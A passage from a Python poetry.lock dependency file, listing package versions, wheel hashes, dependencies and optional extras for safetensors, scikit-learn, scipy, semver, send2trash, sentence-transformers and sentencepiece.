"sha256:8e735b0f79090f6855b55e205e820b7b595502ffca0009a5c13eef3661ce465b"}, {file = "safetensors-0.4.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:f8d2416734e850d5392afffbcb2b8985ea29fb171f1cb197e2ae51b8e35d6438"}, {file = "safetensors-0.4.0-cp37-cp37m-macosx_10_7_x86_64.whl", hash = "sha256:e853e189ba7d47eaf561094586692ba2bbdd258c096f1755805cac098de0e6ab"}, {file = "safetensors-0.4.0-cp37-cp37m-macosx_11_0_arm64.whl", hash = "sha256:4b2aa57b5a4d576f3d1dd6e56980026340f156f8a13c13016bfac4e25295b53f"}, {file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3b6c1316ffde6cb4bf22c7445bc9fd224b4d1b9dd7320695f5611c89e802e4b6"}, {file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:003077ec85261d00061058fa12e3c1d2055366b02ce8f2938929359ffbaff2b8"}, {file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:bd63d83a92f1437a8b0431779320376030ae43ace980bea5686d515de0784100"}, {file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2077801800b4b13301d8d6290c7fb5bd60737320001717153ebc4371776643b5"}, {file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7abe0e157a49a75aeeccfbc4f3dac38d8f98512d3cdb35c200f8e628dc5773cf"}, {file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:3bfed574f6b1e7e7fe1f17213278875ef6c6e8b1582ab6eda93947db1178cae6"}, {file = "safetensors-0.4.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:964ef166a286ce3b023d0d0bd0e21d440a1c8028981c8abdb136bc7872ba9b3d"}, {file = "safetensors-0.4.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:44f84373e42183bd56a13a1f2d8acb1db7fedaeffbd83e79cec861477eee1af4"}, {file = "safetensors-0.4.0-cp37-none-win32.whl", hash = "sha256:c68132727dd86fb641102e494d445f705efe402f4d5e24b278183a15499ab400"}, {file = "safetensors-0.4.0-cp37-none-win_amd64.whl", hash = "sha256:1db87155454c168aef118d5657a403aee48a4cb08d8851a981157f07351ea317"}, {file = "safetensors-0.4.0-cp38-cp38-macosx_10_7_x86_64.whl", hash = "sha256:9e583fa68e5a07cc859c4e13c1ebff12029904aa2e27185cf04a1f57fe9a81c4"}, {file = "safetensors-0.4.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:73e7696dcf3f72f99545eb1abe6106ad65ff1f62381d6ce4b34be3272552897a"}, {file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4936096a57c62e84e200f92620a536be067fc5effe46ecc7f230ebb496ecd579"}, {file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:87b328ee1591adac332543e1f5fc2c2d7f149b745ebb0d58d7850818ff9cee27"}, {file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b69554c143336256260eceff1d3c0969172a641b54d4668489a711b05f92a2c0"}, {file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:3ebf6bcece5d5d1bd6416472f94604d2c834ca752ac60ed42dba7157e595a990"}, {file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6686ce01b8602d55a7d9903c90d4a6e6f90aeb6ddced7cf4605892d0ba94bcb8"}, {file = "safetensors-0.4.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:9b8fd6cc2f3bda444a048b541c843c7b7fefc89c4120d7898ea7d5b026e93891"}, {file = "safetensors-0.4.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:8a6abfe67692f81b8bdb99c837f28351c17e624ebf136970c850ee989c720446"}, {file = "safetensors-0.4.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:27a24ca8822c469ee452db4c13418ba983315a0d863c018a9af15f2305eac38c"}, {file = "safetensors-0.4.0-cp38-none-win32.whl", hash = "sha256:c4a0a47c8640167792d8261ee21b26430bbc39130a7edaad7f4c0bc05669d00e"}, {file = "safetensors-0.4.0-cp38-none-win_amd64.whl", hash = "sha256:a738970a367f39249e2abb900d9441a8a86d7ff50083e5eaa6e7760a9f216014"}, {file = "safetensors-0.4.0-cp39-cp39-macosx_10_7_x86_64.whl", hash = "sha256:806379f37e1abd5d302288c4b2f4186dd7ea7143d4c7811f90a8077f0ae8967b"}, {file = "safetensors-0.4.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:2b9b94133ed2ae9dda0e95dcace7b7556eba023ffa4c4ae6df8f99377f571d6a"}, {file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6b563a14c43614815a6b524d2e4edeaace50b717f7e7487bb227dd5b68350f5a"}, {file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:00a9b157be660fb7ba88fa2eedd05ec93793a5b61e43e783e10cb0b995372802"}, {file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c8f194f45ab6aa767993c24f0aeb950af169dbc5d611b94c9021a1d13b8a1a34"}, {file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:469360b9451db10bfed3881378d5a71b347ecb1ab4f42367d77b8164a13af70b"}, {file = "safetensors-0.4.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f5f75fa97ccf32a3c7af476c6a0e851023197d3c078f6de3612008fff94735f9"}, {file = "safetensors-0.4.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:acf0180283c2efae72f1d8c0a4a7974662091df01be3aa43b5237b1e52ed0a01"}, {file = "safetensors-0.4.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:cd02b495ba0814619f40bda46771bb06dbbf1d42524b66fa03b2a736c77e4515"}, {file = "safetensors-0.4.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:c42bdea183dbaa99e2f0e6120dc524df79cf4289a6f90f30a534444ef20f49fa"}, {file = "safetensors-0.4.0-cp39-none-win32.whl", hash = "sha256:cef7bb5d9feae7146c3c3c7b3aef7d2c8b39ba7f5ff4252d368eb69462a47076"}, {file = "safetensors-0.4.0-cp39-none-win_amd64.whl", hash = "sha256:79dd46fb1f19282fd12f544471efb97823ede927cedbf9cf35550d92b349fdd2"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-macosx_10_7_x86_64.whl", hash = "sha256:002301c1afa32909f83745b0c124d002e7ae07e15671f3b43cbebd0ffc5e6037"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:67762d36ae088c73d4a3c96bfc4ea8d31233554f35b6cace3a18533238d462ea"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0f45230f20a206e5e4c7f7bbf9342178410c6f8b0af889843aa99045a76f7691"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8f2ca939bbd8fb2f4dfa28e39a146dad03bc9325e9fc831b68f7b98f69a5a2f1"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:61a00f281391fae5ce91df70918bb61c12d2d514a493fd8056e12114be729911"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:435fd136a42492b280cb55126f9ce9535b35dd49df2c5d572a5945455a439448"}, {file = "safetensors-0.4.0-pp310-pypy310_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:f0daa788273d683258fb1e4a5e16bef4486b2fca536451a2591bc0f4a6488895"}, {file = "safetensors-0.4.0-pp37-pypy37_pp73-macosx_10_7_x86_64.whl", hash = "sha256:0620ab0d41e390ccb1c4ea8f63dc00cb5f0b96a5cdd3cd0d64c21765720c074a"}, {file = "safetensors-0.4.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bc1fa8d067733cb67f22926689ee808f08afacf7700d2ffb44efae90a0693eb1"}, {file = "safetensors-0.4.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dcaa40bc363edda145db75cd030f3b1822e5478d550c3500a42502ecef32c959"}, {file = "safetensors-0.4.0-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:b561fbc044db7beff2ece0ec219a291809d45a38d30c6b38e7cc46482582f4ba"}, {file = "safetensors-0.4.0-pp37-pypy37_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:79a983b09782dacf9a1adb19bb98f4a8f6c3144108939f572c047b5797e43cf5"}, {file = "safetensors-0.4.0-pp37-pypy37_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:10b65cd3ad79f5d0daf281523b4146bc271a34bb7430d4e03212e0de8622dab8"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-macosx_10_7_x86_64.whl", hash = "sha256:114decacc475a6a9e2f9102a00c171d113ddb5d35cb0bda0db2c0c82b2eaa9ce"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:72ddb741dd5fe42521db76a70e012f76995516a12e7e0ef26be03ea9be77802a"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6c5556c2ec75f5a6134866eddd7341cb36062e6edaea343478a279591b63ddba"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ed50f239b0ce7ae85b078395593b4a351ede7e6f73af25f4873e3392336f64c9"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:495dcaea8fbab70b927d2274e2547824462737acbf98ccd851a71124f779a5c6"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:3f4d90c79a65ba2fe2ff0876f6140748f0a3ce6a21e27a35190f4f96321803f8"}, {file = "safetensors-0.4.0-pp38-pypy38_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:7a524382b5c55b5fbb168e0e9d3f502450c8cf3fb81b93e880018437c206a482"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-macosx_10_7_x86_64.whl", hash = "sha256:9849ea60c7e840bfdd6030ad454d4a6ba837b3398c902f15a30460dd6961c28c"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:6c42623ae7045615d9eaa6877b9df1db4e9cc71ecc14bcc721ea1e475dddd595"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:80cb8342f00f3c41b3b93b1a599b84723280d3ac90829bc62262efc03ab28793"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d8c4f5ed4ede384dea8c99bae76b0718a828dbf7b2c8ced1f44e3b9b1a124475"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:40d7cf03493bfe75ef62e2c716314474b28d9ba5bf4909763e4b8dd14330c01a"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:232029f0a9fa6fa1f737324eda98a700409811186888536a2333cbbf64e41741"}, {file = "safetensors-0.4.0-pp39-pypy39_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:9ed55f4a20c78ff3e8477efb63c8303c2152cdfb3bfea4d025a80f54d38fd628"}, {file = "safetensors-0.4.0.tar.gz", hash = "sha256:b985953c3cf11e942eac4317ef3db3da713e274109cf7cfb6076d877054f013e"}, ] [package.extras] all = ["safetensors[jax]", "safetensors[numpy]", "safetensors[paddlepaddle]", "safetensors[pinned-tf]", "safetensors[quality]", "safetensors[testing]", "safetensors[torch]"] dev = ["safetensors[all]"] jax = ["flax (>=0.6.3)", "jax (>=0.3.25)", "jaxlib (>=0.3.25)", "safetensors[numpy]"] numpy = ["numpy (>=1.21.6)"] paddlepaddle = ["paddlepaddle (>=2.4.1)", "safetensors[numpy]"] pinned-tf = ["safetensors[numpy]", "tensorflow (==2.11.0)"] quality = ["black (==22.3)", "click (==8.0.4)", "flake8 (>=3.8.3)", "isort (>=5.5.4)"] tensorflow = ["safetensors[numpy]", "tensorflow (>=2.11.0)"] testing = ["h5py (>=3.7.0)", "huggingface_hub (>=0.12.1)", "hypothesis (>=6.70.2)", "pytest (>=7.2.0)", "pytest-benchmark (>=4.0.0)", "safetensors[numpy]", "setuptools_rust (>=1.5.2)"] torch = ["safetensors[numpy]", "torch (>=1.10)"] [[package]] name = "scikit-learn" version = "1.3.2" description = "A set of python modules for machine learning and data mining" optional = true python-versions = ">=3.8" files = [ {file = "scikit-learn-1.3.2.tar.gz", hash = "sha256:a2f54c76accc15a34bfb9066e6c7a56c1e7235dda5762b990792330b52ccfb05"}, {file = "scikit_learn-1.3.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:e326c0eb5cf4d6ba40f93776a20e9a7a69524c4db0757e7ce24ba222471ee8a1"}, {file = "scikit_learn-1.3.2-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:535805c2a01ccb40ca4ab7d081d771aea67e535153e35a1fd99418fcedd1648a"}, {file = "scikit_learn-1.3.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1215e5e58e9880b554b01187b8c9390bf4dc4692eedeaf542d3273f4785e342c"}, {file = "scikit_learn-1.3.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0ee107923a623b9f517754ea2f69ea3b62fc898a3641766cb7deb2f2ce450161"}, {file = "scikit_learn-1.3.2-cp310-cp310-win_amd64.whl", hash = "sha256:35a22e8015048c628ad099da9df5ab3004cdbf81edc75b396fd0cff8699ac58c"}, {file = "scikit_learn-1.3.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:6fb6bc98f234fda43163ddbe36df8bcde1d13ee176c6dc9b92bb7d3fc842eb66"}, {file = "scikit_learn-1.3.2-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:18424efee518a1cde7b0b53a422cde2f6625197de6af36da0b57ec502f126157"}, {file = "scikit_learn-1.3.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3271552a5eb16f208a6f7f617b8cc6d1f137b52c8a1ef8edf547db0259b2c9fb"}, {file = "scikit_learn-1.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fc4144a5004a676d5022b798d9e573b05139e77f271253a4703eed295bde0433"}, {file = "scikit_learn-1.3.2-cp311-cp311-win_amd64.whl", hash = "sha256:67f37d708f042a9b8d59551cf94d30431e01374e00dc2645fa186059c6c5d78b"}, {file = "scikit_learn-1.3.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:8db94cd8a2e038b37a80a04df8783e09caac77cbe052146432e67800e430c028"}, {file = "scikit_learn-1.3.2-cp312-cp312-macosx_12_0_arm64.whl", hash = "sha256:61a6efd384258789aa89415a410dcdb39a50e19d3d8410bd29be365bcdd512d5"}, {file = "scikit_learn-1.3.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cb06f8dce3f5ddc5dee1715a9b9f19f20d295bed8e3cd4fa51e1d050347de525"}, {file = "scikit_learn-1.3.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5b2de18d86f630d68fe1f87af690d451388bb186480afc719e5f770590c2ef6c"}, {file = "scikit_learn-1.3.2-cp312-cp312-win_amd64.whl", hash = "sha256:0402638c9a7c219ee52c94cbebc8fcb5eb9fe9c773717965c1f4185588ad3107"}, {file = "scikit_learn-1.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:a19f90f95ba93c1a7f7924906d0576a84da7f3b2282ac3bfb7a08a32801add93"}, {file = "scikit_learn-1.3.2-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:b8692e395a03a60cd927125eef3a8e3424d86dde9b2370d544f0ea35f78a8073"}, {file = "scikit_learn-1.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:15e1e94cc23d04d39da797ee34236ce2375ddea158b10bee3c343647d615581d"}, {file = "scikit_learn-1.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:785a2213086b7b1abf037aeadbbd6d67159feb3e30263434139c98425e3dcfcf"}, {file = "scikit_learn-1.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:64381066f8aa63c2710e6b56edc9f0894cc7bf59bd71b8ce5613a4559b6145e0"}, {file = "scikit_learn-1.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6c43290337f7a4b969d207e620658372ba3c1ffb611f8bc2b6f031dc5c6d1d03"}, {file = "scikit_learn-1.3.2-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:dc9002fc200bed597d5d34e90c752b74df516d592db162f756cc52836b38fe0e"}, {file = "scikit_learn-1.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1d08ada33e955c54355d909b9c06a4789a729977f165b8bae6f225ff0a60ec4a"}, {file = "scikit_learn-1.3.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:763f0ae4b79b0ff9cca0bf3716bcc9915bdacff3cebea15ec79652d1cc4fa5c9"}, {file = "scikit_learn-1.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:ed932ea780517b00dae7431e031faae6b49b20eb6950918eb83bd043237950e0"}, ] [package.dependencies] joblib = ">=1.1.1" numpy = ">=1.17.3,<2.0" scipy = ">=1.5.0" threadpoolctl = ">=2.0.0" [package.extras] benchmark = ["matplotlib (>=3.1.3)", "memory-profiler (>=0.57.0)", "pandas (>=1.0.5)"] docs = ["Pillow (>=7.1.2)", "matplotlib (>=3.1.3)", "memory-profiler (>=0.57.0)", "numpydoc (>=1.2.0)", "pandas (>=1.0.5)", "plotly (>=5.14.0)", "pooch (>=1.6.0)", "scikit-image (>=0.16.2)", "seaborn (>=0.9.0)", "sphinx (>=6.0.0)", "sphinx-copybutton (>=0.5.2)", "sphinx-gallery (>=0.10.1)", "sphinx-prompt (>=1.3.0)", "sphinxext-opengraph (>=0.4.2)"] examples = ["matplotlib (>=3.1.3)", "pandas (>=1.0.5)", "plotly (>=5.14.0)", "pooch (>=1.6.0)", "scikit-image (>=0.16.2)", "seaborn (>=0.9.0)"] tests = ["black (>=23.3.0)", "matplotlib (>=3.1.3)", "mypy (>=1.3)", "numpydoc (>=1.2.0)", "pandas (>=1.0.5)", "pooch (>=1.6.0)", "pyamg (>=4.0.0)", "pytest (>=7.1.2)", "pytest-cov (>=2.9.0)", "ruff (>=0.0.272)", "scikit-image (>=0.16.2)"] [[package]] name = "scipy" version = "1.9.3" description = "Fundamental algorithms for scientific computing in Python" optional = true python-versions = ">=3.8" files = [ {file = "scipy-1.9.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:1884b66a54887e21addf9c16fb588720a8309a57b2e258ae1c7986d4444d3bc0"}, {file = "scipy-1.9.3-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:83b89e9586c62e787f5012e8475fbb12185bafb996a03257e9675cd73d3736dd"}, {file = "scipy-1.9.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1a72d885fa44247f92743fc20732ae55564ff2a519e8302fb7e18717c5355a8b"}, {file = "scipy-1.9.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d01e1dd7b15bd2449c8bfc6b7cc67d630700ed655654f0dfcf121600bad205c9"}, {file = "scipy-1.9.3-cp310-cp310-win_amd64.whl", hash = "sha256:68239b6aa6f9c593da8be1509a05cb7f9efe98b80f43a5861cd24c7557e98523"}, {file = "scipy-1.9.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:b41bc822679ad1c9a5f023bc93f6d0543129ca0f37c1ce294dd9d386f0a21096"}, {file = "scipy-1.9.3-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:90453d2b93ea82a9f434e4e1cba043e779ff67b92f7a0e85d05d286a3625df3c"}, {file = "scipy-1.9.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:83c06e62a390a9167da60bedd4575a14c1f58ca9dfde59830fc42e5197283dab"}, {file = "scipy-1.9.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:abaf921531b5aeaafced90157db505e10345e45038c39e5d9b6c7922d68085cb"}, {file = "scipy-1.9.3-cp311-cp311-win_amd64.whl", hash = "sha256:06d2e1b4c491dc7d8eacea139a1b0b295f74e1a1a0f704c375028f8320d16e31"}, {file = "scipy-1.9.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:5a04cd7d0d3eff6ea4719371cbc44df31411862b9646db617c99718ff68d4840"}, {file = "scipy-1.9.3-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:545c83ffb518094d8c9d83cce216c0c32f8c04aaf28b92cc8283eda0685162d5"}, {file = "scipy-1.9.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0d54222d7a3ba6022fdf5773931b5d7c56efe41ede7f7128c7b1637700409108"}, {file = "scipy-1.9.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cff3a5295234037e39500d35316a4c5794739433528310e117b8a9a0c76d20fc"}, {file = "scipy-1.9.3-cp38-cp38-win_amd64.whl", hash = "sha256:2318bef588acc7a574f5bfdff9c172d0b1bf2c8143d9582e05f878e580a3781e"}, {file = "scipy-1.9.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d644a64e174c16cb4b2e41dfea6af722053e83d066da7343f333a54dae9bc31c"}, {file = "scipy-1.9.3-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:da8245491d73ed0a994ed9c2e380fd058ce2fa8a18da204681f2fe1f57f98f95"}, {file = "scipy-1.9.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4db5b30849606a95dcf519763dd3ab6fe9bd91df49eba517359e450a7d80ce2e"}, {file = "scipy-1.9.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c68db6b290cbd4049012990d7fe71a2abd9ffbe82c0056ebe0f01df8be5436b0"}, {file = "scipy-1.9.3-cp39-cp39-win_amd64.whl", hash = "sha256:5b88e6d91ad9d59478fafe92a7c757d00c59e3bdc3331be8ada76a4f8d683f58"}, {file = "scipy-1.9.3.tar.gz", hash = "sha256:fbc5c05c85c1a02be77b1ff591087c83bc44579c6d2bd9fb798bb64ea5e1a027"}, ] [package.dependencies] numpy = ">=1.18.5,<1.26.0" [package.extras] dev = ["flake8", "mypy", "pycodestyle", "typing_extensions"] doc = ["matplotlib (>2)", "numpydoc", "pydata-sphinx-theme (==0.9.0)", "sphinx (!=4.1.0)", "sphinx-panels (>=0.5.2)", "sphinx-tabs"] test = ["asv", "gmpy2", "mpmath", "pytest", "pytest-cov", "pytest-xdist", "scikit-umfpack", "threadpoolctl"] [[package]] name = "semver" version = "3.0.2" description = "Python helper for Semantic Versioning (https://semver.org)" optional = true python-versions = ">=3.7" files = [ {file = "semver-3.0.2-py3-none-any.whl", hash = "sha256:b1ea4686fe70b981f85359eda33199d60c53964284e0cfb4977d243e37cf4bf4"}, {file = "semver-3.0.2.tar.gz", hash = "sha256:6253adb39c70f6e51afed2fa7152bcd414c411286088fb4b9effb133885ab4cc"}, ] [[package]] name = "send2trash" version = "1.8.2" description = "Send file to trash natively under Mac OS X, Windows and Linux" optional = false python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7" files = [ {file = "Send2Trash-1.8.2-py3-none-any.whl", hash = "sha256:a384719d99c07ce1eefd6905d2decb6f8b7ed054025bb0e618919f945de4f679"}, {file = "Send2Trash-1.8.2.tar.gz", hash = "sha256:c132d59fa44b9ca2b1699af5c86f57ce9f4c5eb56629d5d55fbb7a35f84e2312"}, ] [package.extras] nativelib = ["pyobjc-framework-Cocoa", "pywin32"] objc = ["pyobjc-framework-Cocoa"] win32 = ["pywin32"] [[package]] name = "sentence-transformers" version = "2.2.2" description = "Multilingual text embeddings" optional = true python-versions = ">=3.6.0" files = [ {file = "sentence-transformers-2.2.2.tar.gz", hash = "sha256:dbc60163b27de21076c9a30d24b5b7b6fa05141d68cf2553fa9a77bf79a29136"}, ] [package.dependencies] huggingface-hub = ">=0.4.0" nltk = "*" numpy = "*" scikit-learn = "*" scipy = "*" sentencepiece = "*" torch = ">=1.6.0" torchvision = "*" tqdm = "*" transformers = ">=4.6.0,<5.0.0" [[package]] name = "sentencepiece" version = "0.1.99" description = "SentencePiece python wrapper" optional = true python-versions = "*" files = [ {file = "sentencepiece-0.1.99-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:0eb528e70571b7c02723e5804322469b82fe7ea418c96051d0286c0fa028db73"}, {file = "sentencepiece-0.1.99-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:77d7fafb2c4e4659cbdf303929503f37a26eabc4ff31d3a79bf1c5a1b338caa7"}, {file = "sentencepiece-0.1.99-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:be9cf5b9e404c245aeb3d3723c737ba7a8f5d4ba262ef233a431fa6c45f732a0"}, {file = "sentencepiece-0.1.99-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:baed1a26464998f9710d20e52607c29ffd4293e7c71c6a1f83f51ad0911ec12c"}, {file = "sentencepiece-0.1.99-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9832f08bb372d4c8b567612f8eab9e36e268dff645f1c28f9f8e851be705f6d1"}, {file = "sentencepiece-0.1.99-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:019e7535108e309dae2b253a75834fc3128240aa87c00eb80732078cdc182588"}, {file = "sentencepiece-0.1.99-cp310-cp310-win32.whl", hash = "sha256:fa16a830416bb823fa2a52cbdd474d1f7f3bba527fd2304fb4b140dad31bb9bc"}, {file = "sentencepiece-0.1.99-cp310-cp310-win_amd64.whl", hash = "sha256:14b0eccb7b641d4591c3e12ae44cab537d68352e4d3b6424944f0c447d2348d5"}, {file = "sentencepiece-0.1.99-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:6d3c56f24183a1e8bd61043ff2c58dfecdc68a5dd8955dc13bab83afd5f76b81"}, {file = "sentencepiece-0.1.99-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ed6ea1819fd612c989999e44a51bf556d0ef6abfb553080b9be3d347e18bcfb7"}, {file = "sentencepiece-0.1.99-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:a2a0260cd1fb7bd8b4d4f39dc2444a8d5fd4e0a0c4d5c899810ef1abf99b2d45"}, {file = "sentencepiece-0.1.99-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8a1abff4d1ff81c77cac3cc6fefa34fa4b8b371e5ee51cb7e8d1ebc996d05983"}, {file = "sentencepiece-0.1.99-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:004e6a621d4bc88978eecb6ea7959264239a17b70f2cbc348033d8195c9808ec"}, {file = "sentencepiece-0.1.99-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:db361e03342c41680afae5807590bc88aa0e17cfd1a42696a160e4005fcda03b"}, {file = "sentencepiece-0.1.99-cp311-cp311-win32.whl", hash = "sha256:2d95e19168875b70df62916eb55428a0cbcb834ac51d5a7e664eda74def9e1e0"}, {file = "sentencepiece-0.1.99-cp311-cp311-win_amd64.whl", hash = "sha256:f90d73a6f81248a909f55d8e6ef56fec32d559e1e9af045f0b0322637cb8e5c7"}, {file = "sentencepiece-0.1.99-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:62e24c81e74bd87a6e0d63c51beb6527e4c0add67e1a17bac18bcd2076afcfeb"}, {file = "sentencepiece-0.1.99-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:57efcc2d51caff20d9573567d9fd3f854d9efe613ed58a439c78c9f93101384a"}, {file = 